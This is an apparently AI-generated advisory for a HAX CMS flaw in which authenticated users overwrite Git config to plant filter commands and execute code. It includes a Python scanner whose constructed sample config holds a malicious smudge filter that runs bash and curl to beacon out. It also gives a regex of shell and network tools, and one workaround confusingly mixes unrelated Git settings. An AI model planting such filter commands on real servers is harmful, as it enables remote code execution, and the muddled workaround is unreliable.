CVE-2026-46399 Overview
CVE-2026-46399 is an authenticated file overwrite vulnerability in HAX CMS, an open-source platform that manages microsite networks using PHP or Node.js backends. The flaw affects the PHP version of HAX CMS prior to release 26.0.0. An authenticated attacker can overwrite files used by Git, configure malicious Git filter commands, and trigger code execution on the HAX CMS server. The issue is tracked under CWE-15 (External Control of System or Configuration Setting) and was published to the National Vulnerability Database (NVD) on June 5, 2026. Version 26.0.0 patches the vulnerability.
Critical Impact
Authenticated attackers can achieve remote code execution on HAX CMS PHP servers by abusing Git filter configuration through file overwrite.
Affected Products
- HAX CMS (PHP backend) versions prior to 26.0.0
- HAX CMS deployments using Git-backed microsite storage
- Self-hosted HAX CMS PHP instances exposed to authenticated users
Discovery Timeline
- 2026-06-05 - CVE-2026-46399 published to NVD
- 2026-06-08 - Last updated in NVD database
Technical Details for CVE-2026-46399
Vulnerability Analysis
The vulnerability resides in the PHP backend of HAX CMS, which uses Git to manage microsite content. An authenticated user can overwrite files within Git-controlled directories. By overwriting a Git configuration file, the attacker can register a malicious Git filter command. When HAX CMS subsequently invokes Git operations on the affected repository, Git executes the attacker-controlled filter, resulting in arbitrary command execution under the privileges of the HAX CMS service account.
This is a server-side execution flaw. It does not require user interaction beyond authentication, and the attack is performed over the network against the HAX CMS web interface.
Root Cause
The root cause is improper restriction of file write operations against sensitive Git metadata. HAX CMS does not adequately validate destination paths or filter the configuration keys an authenticated user can influence. This permits modification of Git settings such as filter.<driver>.clean and filter.<driver>.smudge, which Git treats as executable commands during repository operations.
Attack Vector
An authenticated attacker submits a request that overwrites a Git configuration file within a HAX CMS repository. The attacker injects a filter driver definition pointing to an arbitrary shell command. The next Git operation invoked by HAX CMS, such as a checkout or add, triggers the configured filter and executes the attacker's command on the server. Refer to the GitHub Security Advisory GHSA-q759-vxg8-vq5j for additional technical detail.
Detection Methods for CVE-2026-46399
Indicators of Compromise
- Unexpected modifications to .git/config or .gitattributes files within HAX CMS-managed repositories
- Presence of filter.*.clean or filter.*.smudge entries referencing shell utilities, scripts, or network commands
- Web server processes spawning child processes such as sh, bash, python, or curl during HAX CMS Git operations
- Outbound network connections from the HAX CMS host to unfamiliar destinations following authenticated user activity
Detection Strategies
- Monitor file integrity on .git/ directories under HAX CMS content paths and alert on unauthorized changes
- Audit HAX CMS application logs for file write or save operations targeting paths outside expected content directories
- Correlate authenticated session activity with process execution events on the underlying host
Monitoring Recommendations
- Log all HAX CMS API requests that perform file writes and review them for path traversal patterns
- Capture process creation telemetry from the web server user and flag Git-spawned shell processes
- Track the version string of deployed HAX CMS instances and alert on any running version below 26.0.0
How to Mitigate CVE-2026-46399
Immediate Actions Required
- Upgrade all HAX CMS PHP deployments to version 26.0.0 or later without delay
- Audit existing repositories for malicious entries in .git/config and .gitattributes and remove any unauthorized filter definitions
- Rotate credentials and review user accounts on HAX CMS instances that may have been exposed
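To support the .git/config and .gitattributes indicators listed under Detection and the repository audit step above, here is an added Python scanner (not part of HAX CMS or the advisory) that parses a repository's Git config for filter.<driver>.clean, .smudge and .process commands and flags those that reference a shell, interpreter or network tool, correlating each driver with the path patterns .gitattributes attaches it to. The sample config and attributes are constructed, and the list of suspicious commands is an assumption to tune for your environment.

```python
import re

# Section header such as [core] or [filter "indent"]
SECTION_RE = re.compile(r'^\[\s*(\w+)(?:\s+"([^"]*)")?\s*\]$')
# .gitattributes line attaching a filter driver to a path pattern, e.g. '*.html filter=indent'
ATTR_RE = re.compile(r'^([^#\s]\S*)\s+.*?\bfilter=(\S+)')
# Shells, interpreters and network tools a content-repo filter has no business invoking (assumed list)
SUSPICIOUS_RE = re.compile(r'\b(sh|bash|dash|zsh|python\d?|perl|php|curl|wget|nc|ncat)\b')


def parse_filter_drivers(config_text):
    """Return {driver: {key: value}} for every [filter "<driver>"] section of a git config."""
    drivers, section, driver = {}, None, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;':  # blank line or full-line comment
            continue
        header = SECTION_RE.match(line)
        if header:
            section, driver = header.group(1).lower(), header.group(2)
            continue
        if section == 'filter' and driver is not None and '=' in line:
            key, value = (part.strip() for part in line.split('=', 1))
            drivers.setdefault(driver, {})[key.lower()] = value
    return drivers


def find_suspicious_filters(config_text, attributes_text=''):
    """Return (driver, key, command, attached_patterns) for each clean/smudge/process
    command that references a shell, interpreter or network tool."""
    attached = {m.group(1): m.group(2) for m in map(ATTR_RE.match, attributes_text.splitlines()) if m}
    findings = []
    for driver, keys in parse_filter_drivers(config_text).items():
        patterns = sorted(p for p, d in attached.items() if d == driver)
        for key in ('clean', 'smudge', 'process'):
            command = keys.get(key)
            if command and SUSPICIOUS_RE.search(command):
                findings.append((driver, key, command, patterns))
    return findings


# Constructed sample of a tampered .git/config and .gitattributes; not taken from any real site.
SAMPLE_CONFIG = """[core]
\tfilemode = true
[filter "lfs"]
\tclean = git-lfs clean -- %f
\tsmudge = git-lfs smudge -- %f
[filter "indent"]
\tclean = cat
\tsmudge = bash -c "curl -s http://203.0.113.10/beacon" %f
"""
SAMPLE_ATTRIBUTES = "*.html filter=indent\n*.bin filter=lfs\n"
```

Run find_suspicious_filters over the contents of each site's .git/config and .gitattributes; the benign git-lfs driver is left alone while the smudge command of the "indent" driver is reported together with the *.html pattern it is attached to.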
Patch Information
The vendor released HAX CMS version 26.0.0, which remediates the file overwrite condition that enabled Git filter abuse. Full remediation details are available in the HAX CMS GitHub Security Advisory GHSA-q759-vxg8-vq5j.
Workarounds
- Restrict access to authenticated HAX CMS interfaces to trusted users only until the upgrade is complete
- Run HAX CMS under a low-privilege service account that cannot modify system binaries or write outside the application directory
- Configure Git globally with git config --global protocol.file.allow user (note that this setting governs the file:// transport, not filter drivers) and, where feasible, disable filter execution by reviewing core.hooksPath and removing filter drivers that the deployment does not need
# List the filter driver commands defined in each HAX CMS site repository (adjust the path to your install);
# git config -f reads the INI-style .git/config and prints the keys in dotted filter.<driver>.<key> form
for cfg in /path/to/hax-cms/sites/*/.git/config; do
  echo "== $cfg"; git config -f "$cfg" --get-regexp '^filter\..*\.(clean|smudge|process)$'
done
# Show which paths each site's .gitattributes routes through a filter driver
find /path/to/hax-cms/sites -name ".gitattributes" -exec grep -H "filter=" {} \;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.